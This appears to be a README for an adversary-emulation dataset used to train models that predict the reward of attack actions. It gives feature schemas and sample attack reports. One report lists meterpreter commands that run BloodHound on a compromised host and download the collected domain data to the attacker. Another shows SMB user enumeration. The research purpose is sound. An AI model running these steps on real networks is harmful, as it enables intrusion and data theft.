Dataset used for An Evaluation of Machine Learning Models for Autonomous Adversary Emulation

The dataset within this repository is released in order to facilitate research regarding autonomous adversary emulation. The dataset was gathered by running Lore scenarios against a emulated IT-environment. For full description, please see paper X. For seven action categories a number of (feature, reward) samples are recorded. The task is to predict the reward.

For any questions about the dataset, please contact blinded-author.

Directory structure

We use the following ActionCategory and better explained name in the paper:

ActionCategory Paper name
CredentialHarvesting Shellcode to extract credentials
General General
MetasploitLocalExploit Local exploits
MetasploitPost Miscellaneous shellcode
MetasploitServerExploit Server exploits
MetasploitStandardAuxiliary Auxiliary
NetworkScanning Network scanning
OnlinePasswordGuessing Online password guessing
PasswordCracking Password cracking
.
├── evaluation
│   ├── crate_envs              - description of the environment used
│   ├── lore_reports            - description of carried out actions for the scenarios
│   └── lore_scenarios          - description of config files for the scenarios
└── training
    ├── crate_envs              - description of the environment used
    ├── lore_reports            - description of carried out actions for the scenarios
    ├── lore_scenarios          - description of config files for the scenarios
    └── ml_training_samples
        ├── MetasploitPost                      - action category
        │   ├── feature_schema.json             - feature space description
        │   └── dataset_compressed_for_ml.json  - (features, reward) samples
        ├── NetworkScanning
            ├── feature_schema.json
            └── dataset_compressed_for_ml.json

The directory training include the samples that can be used for training ML models. The directory evaluation include data about the tests used to provide a secondary evaluation of the trained models on a different IT environment and using a different Lore scenario configuration.

File descriptions training

For each type of action category, there is an associated feature-space meaning that we essentially require different models for the different categories. The description of the feature-space is found in the feature_schema.json. A excerpt is explained below. The structure of the dataset_compressed_for_ml.json is also explained below.

NetworkScanning - feature_schema.json

A subset of the feature groups and features in the feature groups for the Network Scanning category is found below. There are integers (either categorical or regular), floats, booleans and arrays.

{
    "properties": {
        "ConcernedAbstractAction": {    <---- feature group
            "type": "object",
            "properties": {
                "concerned_abstract_action": {  <--- feature in feature group
                    "type": "integer",  <---- feature type
                    "description": "One hot encoding (index) of the chosen action uid.",    <--- signifies categorical value
                    "minimum": 0,       <--- bounds for the values 
                    "maximum": 5533
                }
            }
        },
        "PreviousActionAttempts": {
            "type": "object",
            "properties": {
                "action_type_previous_tests_count": {
                    "type": "integer",
                    "description": "The number of times the action type has been used during the scenario session." <--- i.e. not categorical
                },
                "action_type_percent_successful": {
                    "type": "float",
                    "description": "The percentage of attempts that the action type has been successful during the scenario session.",
                    "minimum": 0,
                    "maximum": 1
                },
        },
        "ActionBuilderDependencies": {
            "type": "object",
            "description": "Action builder dependencies.",
            "properties": {
                "action_builder_dependency_0": {
                    "type": "array",    <--- signifies multiple values for this feature
                    "items": {
                        "type": "float"
                    },
                    "minItems": 20,     <--- length of array, currently minItems=maxItems for all arrays
                    "maxItems": 20
                },
            }
        },
        "OverallTypeOfOperatingSystem": {
            "type": "object",
            "properties": {
                "os_type": {    <--- another example of categorical feature
                    "type": "integer",
                    "description": "One hot encoding index of overall kind of operating system.",
                    "minimum": 0,
                    "maximum": 3
                }
            }
        },
        "AttackerAndVictimOnTheSameSubnet": {
            "type": "object",
            "properties": {
                "attacker_and_victim_on_the_same_subnet": {
                    "type": "boolean",      <--- can also be simple boolean
                    "description": "If the attacker has access to resources on the same LAN as the victim, and thus can send traffic to it without worrying as much about firewall/nids rulesets etc."
                }
            }
        }
    }
}

NetworkScanning - dataset_compressed_for_ml.json

Each dataset_compressed_for_ml.json has the same structure. A results key with a list of rewards and a feature key with the features. The features dict has the same structure as the feature_schema.json with the features as a list of values. The n:th feature of each list correspond to the n:th reward.

{
    "results": [ float, float, float, float, ... ],
    "features": {
        "ConcernedAbstractAction": {    <---- feature group
            "concerned_abstract_action": [0, 0, 4300, 0, ...],
        },
        "PreviousActionAttempts": {
            "action_type_previous_tests_count": [1, 0, 0, 100, ...],
            "action_type_percent_successful": [0.0, 0.2, 0.0, 0.1, ...],
        },
        "ActionBuilderDependencies": {
            # list of lists of length 20 (as described by feature schema)
            "action_builder_dependency_0": [[0, 0, ...], [0, 0, ...]],
        },
        "OverallTypeOfOperatingSystem": {
            "os_type": [0, 0, 3, 1, ...],
        },
        "AttackerAndVictimOnTheSameSubnet": {
            "attacker_and_victim_on_the_same_subnet": [0, 1, 0, 1, ...],
        }
    }
}

Descriptive information: lore_reports

The .json files in the lore_reports directories include summary reports by Lore for the carried out actions during each executed scenario. Each report describe summary information about an executed action. Two example reports are given below.

{
    "action_category": "Metasploit",
    "action_description": "Determine what local users exist via the SAM RPC service",
    "action_info": {
        "attacker": "134.23.2.150:",
        "target": "134.23.4.44:"
    },
    "action_outcome": "SUCCESSFUL",
    "action_uid": "auxiliary/scanner/smb/smb_enumusers",
    "c2_info": null,
    "mitre_att&ck": {
        "tactics": [
            "TA0007"
        ],
        "techniques": [
            "T1087"
        ]
    },
    "time_end": "2024-06-05 04:23:36",
    "time_start": "2024-06-05 04:23:32"
},
{
    "action_category": "Metasploit.Shellcode",
    "action_description": "Runs BloodHound on a compromised machine as a powershell script (SharpHound.ps1) through a meterpreter session. A session can be matched either by the info-field, address-field, exploit field or session key.",
    "action_info": {
        "commands": [
            "mkdir c:\\\\temp\\\\",
            "load powershell",
            "powershell_import /mnt/sved/tools/SharpHound.ps1",
            "powershell_execute 'Invoke-BloodHound -CollectionMethod All -JSONFolder c:\\\\temp\\\\ -ZipFileName bh_404372.zip'",
            "download c:\\\\temp\\\\bh_404372.zip /mnt/sved/lore/scenarios/Tyrdemo_insider_ANN_1_session_4/reports/bh_404372.zip"
        ],
        "target": "hq01.office.tyrdemo.se"
    },
    "action_outcome": "SUCCESSFUL",
    "action_uid": "BloodHound",
    "c2_info": {
        "active_since": "2024-06-05 04:03:49",
        "established_via": "exploit/multi/handler",
        "shell_type": "meterpreter",
        "shell_user": "system",
        "tunnel_in": "134.23.2.150:8081",
        "tunnel_out": "134.23.3.11:50235"
    },
    "mitre_att&ck": {
        "tactics": [
            "TA0007"
        ],
        "techniques": [
            "T1087.001",
            "T1087.002",
            "T1069.002",
            "T1615",
            "T1018",
            "T1201"
        ]
    },
    "time_end": "2024-06-05 04:05:54",
    "time_start": "2024-06-05 04:05:04"
}

The reports in the evaluation directory are complete, i.e., they include information regarding all carried out Lore scenarios. The reports in the training folder are a subset of the 923 executed Lore scenarios during training.

Descriptive information: crate_envs

The crate_envs directories include descriptive information regarding the IT environments used for the scenarios.

Descriptive information: lore_scenarios

The lore_scenarios directories include the Lore configuration files used for the scenarios.